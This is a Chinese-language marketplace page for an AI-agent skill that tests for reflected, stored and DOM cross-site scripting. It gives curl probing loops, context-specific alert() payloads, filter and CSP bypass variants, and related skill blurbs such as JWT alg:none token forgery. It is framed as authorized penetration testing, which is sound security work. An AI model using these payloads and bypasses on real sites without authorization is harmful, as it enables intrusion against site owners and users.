在 Manus 中运行任何 Skill
一键导入
一键导入
一键在 Manus 中运行任何 Skill
开始使用xss-reflected
星标2
分支0
更新时间2026年6月3日 04:04
检测和验证反射型、存储型和 DOM 型跨站脚本(XSS)漏洞,包括 CSP 绕过和客户端框架注入。
安装
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
SKILL.md
readonly菜单
检测和验证反射型、存储型和 DOM 型跨站脚本(XSS)漏洞,包括 CSP 绕过和客户端框架注入。
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
通过被动来源和受控主动 DNS 枚举目标子域名,发现更多授权攻击面入口。
使用 agent-browser 在授权范围内执行浏览器交互验证,并在需要视觉判断时调用 pents vision-review 生成结构化视觉复核结果。
检测 API 中的功能级授权破坏(BFLA),验证普通用户是否能通过直接调用管理端点或操纵 HTTP 方法来执行管理员功能。
检测 API 中的对象级授权缺陷(BOLA/IDOR),通过篡改对象标识符越权访问或修改其他用户的数据。
利用 JWT 库接受 alg:none 的漏洞绕过签名验证,伪造任意 Token 实现权限提升。
检测 API 中的批量赋值漏洞,通过在请求体中添加非预期字段修改不应被客户端控制的属性。
| name | xss-reflected |
| description | 检测和验证反射型、存储型和 DOM 型跨站脚本(XSS)漏洞,包括 CSP 绕过和客户端框架注入。 |
| category | web |
| source | xalgorix |
| tags | ["XSS","注入","CSP 绕过","OWASP Top 10"] |
| required_tools | ["curl","浏览器开发者工具"] |
alert() / console.log() / document.write()),不窃取 cookie 或执行恶意脚本。列出所有可能存在反射的参数和位置:
# 从 URL 参数集合中提取每个参数
cat inventory.md | grep -oP '\b\w+=' | tr -d '=' | sort -u > params.txt
对每个参数注入探测字符串并观察响应:
# 探测 payload
PROBE='xsstest"><xsstest'
for param in $(cat params.txt); do
curl -s "https://<target>/page?$param=$PROBE" | grep -c 'xsstest'
done
如果响应中包含未编码的 "><xsstest,标记该参数为潜在注入点。
根据注入位置选择 payload 类型:
| 上下文 | 示例 payload |
|---|---|
| HTML 标签体 | <img src=x onerror=alert(1)> |
| HTML 属性值 | " onfocus=alert(1) autofocus " |
| JavaScript 字符串 | ';alert(1);// |
| URL 属性 | javascript:alert(1) |
| CSS 上下文 | </style><img src=x onerror=alert(1)> |
如果基础 payload 被过滤,尝试以下绕过:
# 大小写混合
curl -s "https://<target>/page?q=<ScRiPt>alert(1)</sCrIpT>"
# 标签内空格变体
curl -s "https://<target>/page?q=<img%0dsrc=x%0donerror=alert(1)>"
# HTML 实体编码
curl -s "https://<target>/page?q=<img src=x onerror=alert(1)>"
在浏览器开发者工具中检查 source → sink 流程:
// 常见 sink 函数
// document.write(), innerHTML, eval(), setTimeout(), location.href
// 在控制台中跟踪用户输入是否能到达这些 sink
如果 CSP 阻止内联脚本,尝试:
# 检查 CSP 是否允许特定 CDN
curl -sI https://<target>/ | grep -i 'content-security-policy'
# 如果允许 unsafe-eval 或特定域名,尝试通过允许的源加载 payload